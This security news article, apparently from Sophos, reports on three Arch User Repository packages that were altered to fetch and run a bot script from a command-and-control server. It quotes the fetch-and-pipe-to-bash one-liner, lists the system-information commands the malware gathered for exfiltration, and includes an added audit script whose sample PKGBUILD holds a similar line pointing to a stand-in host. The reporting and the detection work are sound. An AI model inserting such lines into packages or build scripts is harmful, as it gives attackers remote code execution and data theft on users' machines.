Another Linux community with malware woes

Another day, another Linux community with malware woes.

Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating system and rebuilding all their software from scratch to wring a few percentage points of performance out of it.

That sort of thing isn’t for everyone, but it’s harmless fun and it does give you loads of insight into how everything fits together.

That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but don’t leave you with much of a sense of how it all actually works.

This time, the malware poisoning happened to Arch Linux, another distro we’d characterise as hard-core, though very much more widely used than Gentoo.

Three downloadable software packages in the AUR, short for Arch User Repository, were found to have been rebuilt so they contained what you might (perhaps slightly unkindly) refer to as zombie downloader robot overlord malware.

Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.

The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they’ve all apparently been restored to their pre-infection state.

What happened?

Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:

   curl -s https://[redacted]/~x|bash -&

This single line of code, part of a package creation script written in the Bash language, fetches a text file from a command-and-control (C&C) server and runs it as a script in its own right.

The command curl is a program that fetches a web page using HTTP or HTTPS. The pipe character (|) is Unix shorthand for “use the output of the command on the left directly as the input of the command on the right”. And bash - says to read the data that’s coming in as input, denoted by the dash (-), and run it directly as a script program. The pipe character therefore means you don’t need to run one command to fetch a file and then tell the next command to read the same file back in – the data is, literally and figuratively, piped between the two programs via memory. Finally, the ampersand (&) means to run the whole thing in the background so that it’s as good as invisible.

This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the C&C server.
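As an added illustration (not code from the article, from Arch or from the AUR), here is a small shell audit that flags fetch-and-pipe-to-shell lines like the one above so a PKGBUILD can be checked before makepkg runs it; the two sample PKGBUILD files and the c2.example.invalid host are constructed for the demo.

```shell
#!/bin/sh
# Added example: flag lines where a download tool's output is piped straight
# into a shell (curl ... | bash, wget ... | sh, optionally backgrounded with &).
# Assumption: $1 is a PKGBUILD (or any shell script) already on disk.

audit_pkgbuild() {
    # Prints each suspicious line with its line number.
    # Returns 1 if anything was found, 0 if the file looks clean.
    grep -nE '(curl|wget)[^|]*[|][[:space:]]*(ba|z|da|k)?sh([^A-Za-z0-9_]|$)' "$1" \
        && return 1
    return 0
}

# Constructed sample: a build() function with a one-liner like the AUR case.
BAD_PKGBUILD=$(mktemp)
cat > "$BAD_PKGBUILD" <<'EOF'
pkgname=example-pkg
pkgver=1.0
build() {
    make
    curl -s https://c2.example.invalid/~x|bash -&
}
EOF

# Constructed sample: downloads a file and verifies it, but never pipes to a shell.
GOOD_PKGBUILD=$(mktemp)
cat > "$GOOD_PKGBUILD" <<'EOF'
pkgname=example-pkg
pkgver=1.0
build() {
    make
    curl -sO https://mirror.example.invalid/src.tar.gz
    sha256sum -c src.tar.gz.sha256
}
EOF

for f in "$BAD_PKGBUILD" "$GOOD_PKGBUILD"; do
    if audit_pkgbuild "$f"; then
        echo "$f: no pipe-to-shell lines found"
    else
        echo "$f: SUSPICIOUS, review before building"
    fi
done
```

The pattern is deliberately narrow (a download tool piped into a shell on one line); it is a first-pass screen for a manual review of the PKGBUILD, not a substitute for reading it.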

At present, the ~x command sets up a regular background task – the Linux equivalent of a Windows service – that repeatedly runs a second script downloaded from the web page ~u on the same C&C server.

The file tries to extract some basic data about the infected system, and to upload it to a Pastebin account.

The system data that the malware is interested in comes from the following Arch commands:

 echo ${MACHINE_ID}    -- this computer's unique ID (randomly generated at install time)
 date '+%s'            -- the current date and time
 uname -a              -- details about the Linux version that's loaded
 id                    -- details about the user account running the script
 lscpu                 -- technical details about the system processor chip
 pacman -Qeq           -- the software you've installed (Qe means "query explicit")
 pacman -Qdq           -- any extra software needed to go with it (Qd means "query dependencies")
 systemctl list-units  -- all the system services

Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.

The Arch reaction

Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.

Where Arch has been – how can we say this? – a little less likable, is the extent to which the distro’s culture mirrors the aggressive “alpha techiness” of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.

So we weren’t entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant “meh”:

This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?

This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.

To be fair to the Arch team, the hacked packages were found in the AUR, the Arch User Repository, which isn’t vouched for or vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.

Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team wouldn’t hurt.

What to do?

You might not like Arch’s attitude – and if you don’t, you’re probably using a different distro anyway – but the warning on the community-operated Arch User Repository does, in fact, say it all, even if we’d sneak a hyphen between “user” and “produced”:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

If you don’t trust it, don’t install it.

Note. We don’t expect this thing to be a problem in real life, but Sophos products will nevertheless detect the abovementioned scripts as Linux/BckDr-RVR, and block the C&C URLs used to “feed” the attack.